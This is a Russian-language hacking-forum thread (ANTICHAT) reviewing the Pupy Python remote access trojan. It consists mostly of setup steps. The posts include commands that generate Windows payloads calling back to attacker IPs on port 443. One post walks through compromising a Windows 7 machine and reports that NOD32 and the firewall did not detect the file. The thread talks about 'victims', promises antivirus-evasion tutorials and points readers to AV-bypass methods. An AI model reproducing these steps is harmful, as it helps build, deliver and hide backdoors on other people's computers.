HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.11.2016, 05:43
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.

Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...

После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт.

Я считаю что его можно отлично использовать для:
  • security research
  • обучения
  • пентестинга
  • администрирования
И так давайте все же познакомимся с ним по ближе.
Создаем PAYLOAD
Ну для начала скачаем все же и установим зависимости(я делаk на Kali Linux):

Код:


Код:
git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
git submodule update --init --depth 1 pupy/payload_templates
git submodule init
git submodule update
pip install -r requirements.txt

Дальше идем в папку pupy и там нас пока что интересуют только два файла:
pupygen.py-сам билдер(генератор) так сказать иpupysh.pyсама серверная часть,консоль управления.

Я попытаюсь кратко описать функционал,иначе статья будет очень длинная. Одна из фишек этой тулзы это транспорты и скриплеты которые позволяют выбирать тип шифрования трафика ,а скриплеты позволяют запустить какой то модуль сразу же при старте вредоноса(например кейлоггер) Посмотреть список скриплетов и транспортов можно командой

Код:


Код:
python pupygen.py -l

Cгенерировать бинарник под виндоус систему можно следующей командой:

Код:


Код:
./pupygen.py -f exe_x86 -o ~/DarkNode.exe connect --host 192.168.137.137:443

После этого парим жертве(правда он скорее всего спалится антивирусом,но в следующих статья я научу его вас обходить,это ознакомительная часть)

Дальше все очень похоже на метерпретер сессию метаслоита:
Открываем сессию командой

Код:


Код:
session -i 1
пользуемся командамы
help

list_modules

run module_name -h










Спасибо за внимания.C Вами былDarkNode)
 
Ответить с цитированием

  #2  
Старый 15.11.2016, 10:39
koldonuuchu
Новичок
Регистрация: 11.11.2016
Сообщений: 0
С нами: 5002205

Репутация: 0
По умолчанию

Зачет!
 
Ответить с цитированием

  #3  
Старый 13.06.2017, 13:51
id2746
Новичок
Регистрация: 13.11.2016
Сообщений: 0
С нами: 4999287

Репутация: 0
По умолчанию

Инструмент периодически обновляется и является актуальным на сегодняшний день.

Пример компрометации для малоопытных пользователей:
В качастве атакующей систем kali linux 2017.1 с адресом 192.168.43.162
В качасве атакуемой системы win7 x64 c АВ NOD32.

Генерируем нагрузку:

Код:


Код:
./pupygen.py -f client -O windows -A x64 -o test_for_codeby.exe --randomize-hash connect --host 192.168.43.162:443


Получаем файл (test_for_codeby.exe) с заданными параметрами:



он находится в папке с pupy:



Доставляем файл на целевую систему, после чего из папку с pupy запускаем клиентскую часть:

Код:


Код:
./pupysh.py


Проверим файл NOD'ом c обновленными от 13.05.2017г. сигнатурами:



Как видим, всё ОК.

После запуска файла на целевой системе получаем сессию:



Список команд:



Наш процесс ID и разыв сессии:



Спасибо ~~DarkNode~~за обзор!!!
[doublepost=1497343964,1497343770][/doublepost]П.С. Мой пост к тому, что благодаря шифрованию и SSL ни брандмауэр ни АВ наш файл не заблокировали.
Минусом лично для меня является размер файла



[doublepost=1497347490][/doublepost]Еще добавлю.
В отличие от meterpreter, при разрыве сессии отсутствует необходимость повторной эксплуатации цели (в случае с pupy это повторный запуск вредоносного файла на целевой машине). Т.е. если процесс не был завершен, то достаточно повторно запустить листенер.
 
Ответить с цитированием

  #4  
Старый 13.06.2017, 14:33
ghost
Новичок
Регистрация: 27.04.2010
Сообщений: 0
С нами: 8442422

Репутация: 0
По умолчанию

Avast детектировал файл test_for_codeby.exe как вирус!
 
Ответить с цитированием

  #5  
Старый 13.06.2017, 14:56
id2746
Новичок
Регистрация: 13.11.2016
Сообщений: 0
С нами: 4999287

Репутация: 0
По умолчанию

Только что сгенерировал с отличными от первого файла параметрами, NOD молчит (тест в virtualbox)





Вчера тестировал на реальной машине - тоже тишина
На VT не хочу загонять.
 
Ответить с цитированием

  #6  
Старый 13.06.2017, 15:03
ghost
Новичок
Регистрация: 27.04.2010
Сообщений: 0
С нами: 8442422

Репутация: 0
По умолчанию

С отключенным антивирем прекрасно работает
 
Ответить с цитированием

  #7  
Старый 13.06.2017, 20:48
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

сам пользуюсь этой утилитой( как пост эксплуатацией) ..впечатления хорошее, но палится некоторыми антивирусами.
 
Ответить с цитированием

  #8  
Старый 19.09.2017, 12:37
id2746
Новичок
Регистрация: 13.11.2016
Сообщений: 0
С нами: 4999287

Репутация: 0
По умолчанию

на днях сгенерированный файл был спален на целевой системе стандартным виндовым АВ.
 
Ответить с цитированием

  #9  
Старый 19.09.2017, 13:30
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию

Цитата:

id2746 сказал(а):

на днях сгенерированный файл был спален на целевой системе стандартным виндовым АВ.

в грей секции полно способов обхода АВ)) моя колонка))
 
Ответить с цитированием

  #10  
Старый 13.12.2017, 19:16
Sharky
Познавший АНТИЧАТ
Регистрация: 01.05.2006
Сообщений: 1,021
С нами: 10541186

Репутация: 921


По умолчанию

Опять ошибки при установке. Как же они за..Ладно.
При установке m2crypto возникала ошибка, поэтому пришлось:
  1. Убрать строку m2crypto из requirements.txt
  2. sudo apt-get install python-m2crypto
Также не мог установить кучу того, что требовалось, поэтому sudo.
Ещё не мог установить из-за того, что нужен python-dev. Решилось так:
  1. sudo aptitude install python-dev
  2. n [enter]
  3. Y [enter]
  4. sudo aptitude upgrade
Надеюсь помог тем, у кого та же проблема.
[Добавка от 13.12.2017: 16 - 03 МСК]
"Template not found (/home/server/Загрузки/Прочее/pupy/pupy/payload_templates/pupyx86.exe)"
Решение:
  1. wget https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz
  2. tar xvf payload_templates.txz && mv payload_templates/* pupy/payload_templates/ && rm payload_templates.txz && rm -r payload_templates
[doublepost=1513178216,1513169557][/doublepost]Ещё проблема с установкой PyAutoGUI.
Решение #1:
  1. pip install python-xlib
  2. sudo apt-get install scrot
  3. sudo apt-get install python-tk
  4. См. установку python-dev комментарием выше
  5. pip install pyautogui
Решение #2:
  1. Ставьте PyAutoGUI без SSH (т.е. не используя SSH)
Причина неизвестна, но так нужно сделать.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...